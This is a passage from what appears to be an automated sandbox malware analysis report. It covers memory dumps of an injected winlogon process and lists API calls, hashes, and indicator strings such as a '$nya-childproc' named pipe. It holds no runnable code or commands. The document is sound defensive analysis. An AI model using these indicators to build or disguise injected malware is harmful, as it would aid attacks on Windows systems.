                                                                      • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                                      • Instruction Fuzzy Hash: B3114C32624B80C3E7148B21F45439EBB60FB89BD4F944326EE5E42AA8CF3CC154CB44
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                                      • String ID: \\.\pipe\$nya-childproc
                                                                      • API String ID: 166002920-3933612297
                                                                      • Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                                      • Instruction ID: 890af977762eef70603ace4a83a4d3497f66bcba6cb61f9a36ffc4f47a52a63b
                                                                      • Opcode Fuzzy Hash: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
                                                                      • Instruction Fuzzy Hash: 4D111C36624B80C2E7108B21F45839EB761FB89BD4F944326EE5E06AA8DF7CC155CB40
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction ID: 27e388ff75f9968c1a3076ffa7c8abd796299204315aad1e00faac73bc9cbdb0
                                                                      • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction Fuzzy Hash: 97819B346386C4DEFB50AB66D8423EDF691AF89BC2F54423BAE4C57796DE38C8418700
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction ID: e54040a27443ae2300c5be9bf8658d7072c2ffb2ec2708cb8b87e5662e836920
                                                                      • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction Fuzzy Hash: 7E81E2346306C4E7FB55ABA5D8423EDFA90AF85784F444037AE4C57796EF38C8618702
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction ID: aa7ed4abcabeb614043bce7b7e16046e57dd419dc341306133ec101a34ba4041
                                                                      • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction Fuzzy Hash: E581AD356306C6D6FB50AB66D8823EDF291AF85B84F444137AE4D67796DF38C8418F10
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000003.2361473448.000001E858950000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858950000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_3_1e858950000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID:
                                                                      • API String ID: 190073905-0
                                                                      • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction ID: 121e28eb92a0111003718f76d7d7e0b3ae02a8899872275c93aa002c61d90da1
                                                                      • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                      • Instruction Fuzzy Hash: 76819E796302C1EAFA549B66E8C13DDF2D1AF86782F448037AE0D47796DF38CA468700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: !-M$ !-M$ !-M$ !-M$ !-M
                                                                      • API String ID: 3215553584-1373438697
                                                                      • Opcode ID: e24968551f1c80c218f728ec495c536f69034c28ce2eb30166b49967c8b6e302
                                                                      • Instruction ID: df305f1c95cecc459bc4b1112c6c6f1bf5fc172a448fd26f6a770b9b0e0d4e71
                                                                      • Opcode Fuzzy Hash: e24968551f1c80c218f728ec495c536f69034c28ce2eb30166b49967c8b6e302
                                                                      • Instruction Fuzzy Hash: 41619B326306C0D3FA799B29D5443EEFEA0AF85784F5544B7DE8E067A5EF38C9618201
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,000001E8589B9C6B,?,?,?,000001E8589B945C,?,?,?,?,000001E8589B8F65), ref: 000001E8589B9B31
                                                                      • GetLastError.KERNEL32(?,?,?,000001E8589B9C6B,?,?,?,000001E8589B945C,?,?,?,?,000001E8589B8F65), ref: 000001E8589B9B3F
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,000001E8589B9C6B,?,?,?,000001E8589B945C,?,?,?,?,000001E8589B8F65), ref: 000001E8589B9B69
                                                                      • FreeLibrary.KERNEL32(?,?,?,000001E8589B9C6B,?,?,?,000001E8589B945C,?,?,?,?,000001E8589B8F65), ref: 000001E8589B9BD7
                                                                      • GetProcAddress.KERNEL32(?,?,?,000001E8589B9C6B,?,?,?,000001E8589B945C,?,?,?,?,000001E8589B8F65), ref: 000001E8589B9BE3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                                      • Instruction ID: 8343e08e4e288325730640f339af24e135ccc61e1639655fc0950d2a29a0937e
                                                                      • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                                      • Instruction Fuzzy Hash: 5F318B3123AA95D9EE129B06E8047EDB394FF89BA1F590636AD1E4A790EE38C444C310
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,000001E8589E9C6B,?,?,?,000001E8589E945C,?,?,?,?,000001E8589E8F65), ref: 000001E8589E9B31
                                                                      • GetLastError.KERNEL32(?,?,?,000001E8589E9C6B,?,?,?,000001E8589E945C,?,?,?,?,000001E8589E8F65), ref: 000001E8589E9B3F
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,000001E8589E9C6B,?,?,?,000001E8589E945C,?,?,?,?,000001E8589E8F65), ref: 000001E8589E9B69
                                                                      • FreeLibrary.KERNEL32(?,?,?,000001E8589E9C6B,?,?,?,000001E8589E945C,?,?,?,?,000001E8589E8F65), ref: 000001E8589E9BD7
                                                                      • GetProcAddress.KERNEL32(?,?,?,000001E8589E9C6B,?,?,?,000001E8589E945C,?,?,?,?,000001E8589E8F65), ref: 000001E8589E9BE3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                                      • Instruction ID: f8a3c0cb4d6d19ef5e9a90df121615d9a97d4b6a7d9f19caa0dcf2ecab134b8b
                                                                      • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                                      • Instruction Fuzzy Hash: 44315C31332781D6EE169B16E8407EDBB94BF84BA4F5D0636AD1E4A794EF38C464C350
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,000001E858989C6B,?,?,?,000001E85898945C,?,?,?,?,000001E858988F65), ref: 000001E858989B31
                                                                      • GetLastError.KERNEL32(?,?,?,000001E858989C6B,?,?,?,000001E85898945C,?,?,?,?,000001E858988F65), ref: 000001E858989B3F
                                                                      • LoadLibraryExW.KERNEL32(?,?,?,000001E858989C6B,?,?,?,000001E85898945C,?,?,?,?,000001E858988F65), ref: 000001E858989B69
                                                                      • FreeLibrary.KERNEL32(?,?,?,000001E858989C6B,?,?,?,000001E85898945C,?,?,?,?,000001E858988F65), ref: 000001E858989BD7
                                                                      • GetProcAddress.KERNEL32(?,?,?,000001E858989C6B,?,?,?,000001E85898945C,?,?,?,?,000001E858988F65), ref: 000001E858989BE3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                                      • Instruction ID: 374182d59c510931cae3981e872b1b6b55f0781e7ed9810ecfe8984184a01ada
                                                                      • Opcode Fuzzy Hash: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
                                                                      • Instruction Fuzzy Hash: EE3180313226C2D9EE519B16E8007EDB394BF84BA0F590636ED1E47794EF38C454CB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                                      • Instruction ID: c05947797211d943349e5f043b86dc6255ec19a61c6acd9a3f94605f3853e510
                                                                      • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                                      • Instruction Fuzzy Hash: 87115E31320A80C6E7508B52E85875DBBA4FB88BE4F444236EE5E87B94CF3AC5048744
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                                      • Instruction ID: e72e18b605afdd5bcfa60b8c88aedce03ad5969cf3547dfeba78ac7931b4ad38
                                                                      • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                                      • Instruction Fuzzy Hash: A2116D31334B80C6E7568B52E89479DB6A0FB88BE4F444236EE5E87BA4DF38C8048744
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                                      • Instruction ID: 8c796445a0a8e8026d7b7265435b7dbda3745146acc9fcb33f3d7d1e27673c1e
                                                                      • Opcode Fuzzy Hash: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
                                                                      • Instruction Fuzzy Hash: B4115B31320A80C6E7608B52E85479EB7A5FB88FE4F444226EE5E87BA4DF39C8148740
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                                      • Instruction ID: a191e6a0ed449dbc1da06b4a6404c3c89197badc4939fb1cd1456c3767b6dfbf
                                                                      • Opcode Fuzzy Hash: b08b5ce39edb43236479958ddd03c6d1f6838080b2cf9501a19bb2138673ce94
                                                                      • Instruction Fuzzy Hash: 01D17776219BC8C6DA619B0AE49439EB7A0F7C8B89F500226EECD477A5DF3CC551CB04
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Free$CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 564911740-0
                                                                      • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                                      • Instruction ID: 05430f933ca7a39d30ee09cab9032ffafbc013e3b8653f389b9e934b910f23b4
                                                                      • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                                      • Instruction Fuzzy Hash: B151AD31226B85D9EB05AB68EC912DCF3A1FF0474AF840837AD2D063A6EF78D519C744
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Free$CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 564911740-0
                                                                      • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                                      • Instruction ID: 13aa602f029e6cc9a32b07f007a4e989ca9e89a23b5a55c110bf162087638abd
                                                                      • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                                      • Instruction Fuzzy Hash: A7519371221BC5D6EB06EB64EC912ECB7A1BF04748F840837AE2D067A5EF78D529C341
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3534599925.000001E858981000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                                                                      • Associated: 00000008.00000002.3533735218.000001E858980000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3535725858.000001E858995000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3536537928.000001E8589A0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3537361922.000001E8589A2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3538207117.000001E8589A9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e858980000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Free$CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 564911740-0
                                                                      • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                                      • Instruction ID: 99470b0f7017a8c61bb0c0787b1a05bb0bdfa3df255cc2376668a255bff162d9
                                                                      • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                                      • Instruction Fuzzy Hash: 6A518275221BC6D6EB05EB64ECA12DCB3A1BF04748F840937AD2D067A5EF78D519CB40
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3539824965.000001E8589B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3539036268.000001E8589B0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3540725433.000001E8589C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3541560017.000001E8589D0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3542432651.000001E8589D2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3543268842.000001E8589D9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589b0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: $nya-
                                                                      • API String ID: 756756679-1266920357
                                                                      • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                                      • Instruction ID: f7b3a5484bd7993fa959433514711ee3bc4ddd655ca7dcbf2dc5e8e85caf748a
                                                                      • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                                      • Instruction Fuzzy Hash: DD317A32729B95CAEB10DF26E9453ADF7A0BF44B85F084032AE4C07B55EF34C8658700
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3545056111.000001E8589E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                                                                      • Associated: 00000008.00000002.3544153683.000001E8589E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546079589.000001E8589F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3546958683.000001E858A00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3547830442.000001E858A02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000008.00000002.3548702703.000001E858A09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_1e8589e0000_winlogon.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: $nya-
                                                                      • API String ID: 756756679-1266920357
                                                                      • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
